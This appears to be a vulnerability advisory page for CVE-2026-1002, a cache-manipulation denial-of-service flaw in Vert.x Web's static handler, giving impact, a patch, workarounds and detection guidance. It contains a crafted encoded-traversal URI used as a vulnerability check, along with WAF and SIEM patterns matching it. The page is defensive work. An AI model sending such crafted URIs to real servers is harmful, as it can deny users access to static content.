CVE-2026-1002 – This vulnerability in Vert.x Web's static handl... (How to Fix)

Q: What is the severity of CVE-2026-1002?

CVE-2026-1002 has a CVSS score of 5.3 (MEDIUM). This vulnerability in Vert.x Web's static handler allows attackers to manipulate the cache to deny access to static files via specially crafted URIs. It affects applications using Vert.x Web's static handler with caching enabled. The issue stems from improper URI normalization implementation.

📋 TL;DR

This vulnerability in Vert.x Web's static handler allows attackers to manipulate the cache to deny access to static files via specially crafted URIs. It affects applications using Vert.x Web's static handler with caching enabled. The issue stems from improper URI normalization implementation.

💻 Affected Systems

Products:

Vert.x Web
Vert.x Core

Versions: All versions before the fix in PR #5895

Operating Systems: All platforms running Vert.x

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects applications using StaticHandler with caching enabled (default is enabled).

📦 What is this software?

Vert.x Web by Eclipse

View all CVEs affecting Vert.x Web →

Vert.x Web by Eclipse

View all CVEs affecting Vert.x Web →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete denial of service for all static content served by the application, potentially breaking application functionality that relies on static assets.

🟠

Likely Case

Selective denial of access to specific static files, causing partial service disruption for users.

🟢

If Mitigated

No impact if caching is disabled or the patch is applied.

🌐 Internet-Facing: HIGH - Publicly accessible static handlers can be easily targeted with simple HTTP requests.

🏢 Internal Only: MEDIUM - Internal applications are still vulnerable but have reduced attack surface.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires only HTTP requests with crafted URIs, no authentication needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Version containing PR #5895 fix

Vendor Advisory: https://github.com/eclipse-vertx/vert.x/pull/5895

Restart Required: Yes

Instructions:

1. Update Vert.x to version containing PR #5895 fix. 2. Restart application. 3. Verify caching behavior is corrected.

🔧 Temporary Workarounds

Disable Static Handler Cache

all

Disables caching in StaticHandler which prevents the vulnerability

StaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false);

🧯 If You Can't Patch

Implement WAF rules to block URIs containing patterns like '%2F..%2F'
Use reverse proxy to sanitize and normalize URIs before reaching Vert.x

🔍 How to Verify

Check if Vulnerable:

Test with crafted URI: Access a known static file, then try accessing same file with pattern like '/foo/bar%2F..%2Findex.html'. If second request returns 404, system is vulnerable.

Check Version:

Check Vert.x version in application dependencies or runtime

Verify Fix Applied:

Repeat vulnerable test - crafted URI should return the file normally, not 404.

📡 Detection & Monitoring

Log Indicators:

Multiple 404 responses for known static files
URIs containing '%2F..%2F' patterns in access logs

Network Indicators:

HTTP requests with encoded slash patterns in URIs
Unusual 404 response patterns for static content

SIEM Query:

http.uri contains "%2F..%2F" AND http.status_code = 404

📊 Metadata

CVE ID: CVE-2026-1002

CVSS v3 Score: 5.3 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE: CWE-444

EPSS Score: 0.04% exploit probability (12.7th percentile)

Published: January 15, 2026

Last Updated: February 5, 2026

🔗 References

https://github.com/eclipse-vertx/vert.x/pull/5895 Issue Tracking,Patch
https://github.com/vert-x3/vertx-web/issues/2836 Exploit

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-1002, you might also want to check these: